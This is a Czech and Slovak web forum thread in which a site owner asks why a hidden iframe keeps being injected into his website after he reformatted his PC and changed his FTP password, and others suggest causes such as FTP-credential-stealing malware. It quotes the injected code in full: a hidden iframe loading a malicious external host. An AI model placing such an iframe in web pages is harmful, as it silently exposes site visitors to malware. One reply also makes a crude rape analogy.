Autor Zpráva
Matess
Profil *
Ahoj
na mém webu se mi objevují viry (vkládá se mi tam nějaký <inframe>), ale problém je v tom, že já nepoužívám Total Comander.
Stránky edituji přímo na serveru pomocí PSPadu. Heslo v něm mám uložené.

Myslíte, že by mohl ten vir napadat i PSPad?
Můžete mi to někdo potvrdit nebo vyvrátit?

Zformátoval jsem PC, nahrál jsem novou verzi PSPadu, změnil heslo k FTP a stejně se mi za týden opět objevil na stránkách.

Jiná možnost mě prostě nenapadá.

Díky za vaše nápady a rady.
vynalezce
Profil
co chyba v kodu?
pouzivas php?

napadat pspad? rekl bych ze klidne
Chamurappi
Profil
Reaguji na Matessa:
Já bych na místě autora viru „upgradoval“ knihovnu pro síťovou komunikaci, aby mi hlídala veškeré dění na FTP protokolu. Pak bych se nemusel starat o to, kdo používá jakého FTP klienta a kdo si jak šifruje uložená hesla…

Jiná možnost mě prostě nenapadá.
Asi je to hloupá otázka, ale odvirovat svůj stroj jsi zkoušel?
Jsi jediný, kdo má heslo k FTP?
Matess
Profil *
Chamurappi
Asi je to hloupá otázka, ale odvirovat svůj stroj jsi zkoušel?
Jsi jediný, kdo má heslo k FTP?


Ano prvně jsem ho zformátoval a pak i projel antivirem.
Ano jsem jediný kdo má heslo k FTP.
Radek9
Profil
Můžeš nám říct o jaké viry se jedná? JS? Popřípadě i kus kódu.
Matess
Profil *
Radek9
To víš, že můžu. Je to nějaký trojský kůň (hlásí mi to Avast).

A na stránky mi to vloží tento kod:
<iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe>
Radek9
Profil
Matess
Známá klasika. Samé čínské stránky. Zkus pomocí PSPadu ukládat na jiný server. Pokud virus bude i tam, máš něco s pspadem.
pollo22
Profil
Matess
Akého FTP klienta používaš? na 99% je to ním...
Opdporúčam ti používať filezilla
Chamurappi
Profil
Reaguji na pollo22:
Akého FTP klienta používaš? na 99% je to ním...
Sám FTP klient tohle nikdy způsobit nemůže. Dělá to virus.
Je jen otázka, kde se ta potvora skrývá, když si je Matess jistý, že v jeho počítači ne.
pollo22
Profil
Chamurappi
No nehovorim že to spôsoby on. Ale ako programator som mal veľa skusenosti stym že uložene hesla napr v TotalComanderi sa daju ľachko zystiť no a potom už vyrus infikuje stranku. pomôže iba poriadny ftp klient a zmena hesiel....
Bubák
Profil
pollo22
Podivná logika. To je, jako bys trestal znásilněné ženy, protože si za to můžou samy. Ostatní ženy by se pak bály chodit vyzývavě oblečené a koketovat s chlapama.

Ještě dodám, pokud bych měl zavizovaný počítač a byl bych nucen co nejrychleji aktualizovat web, použiju nějaký malý Live Linux a aktualizaci přes FTP udělám v něm. Ostatně není špatné mít aspoň jedno záchranné Live CD po ruce.
imploder
Profil
Matess
Změnil sis hesla? Je možné, že virus sice není v tvojem počítači, ale když tam dřív byl, tak odeslal hesla do svojí sítě a teď se k tobě na FTP dostává (pokud máš pořád stejné heslo co tehdy) z jiných napadených počítačů.
Chamurappi
Profil
Reaguji na pollo22:
Matess psal: „problém je v tom, že já nepoužívám Total Comander.


Reaguji na implodera:
Matess psal: „Zformátoval jsem PC, nahrál jsem novou verzi PSPadu, změnil heslo k FTP a stejně se mi za týden opět objevil na stránkách.


Reaguji na Bubáka:
Předchozí verze tvého příspěvku mi nepřipadala špatná.
_es
Profil
Matess
Zformátoval jsem PC, nahrál jsem novou verzi PSPadu, změnil heslo k FTP a stejně se mi za týden opět objevil na stránkách.

Nespúšťal si potom nič, kde by mohol byť vírus?
Poznal som jedného, čo už keď musel v dôsledku vírusov celý systém nainštalovať znovu, tak potom z toho istého hardisku spúšťal hry, lebo "si predsa nezmaže také dobré hry".
Bubák
Profil
Chamurappi
Koukám, že jsem udělal chybu při editaci (překlik?), pohrabu v paměti, co jsem to původně napsal.
Dodatek: Snad se mi to povedlo.

Vaše odpověď

Mohlo by se hodit

Příspěvky nesouvisející s webem budou odstraněny.

Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: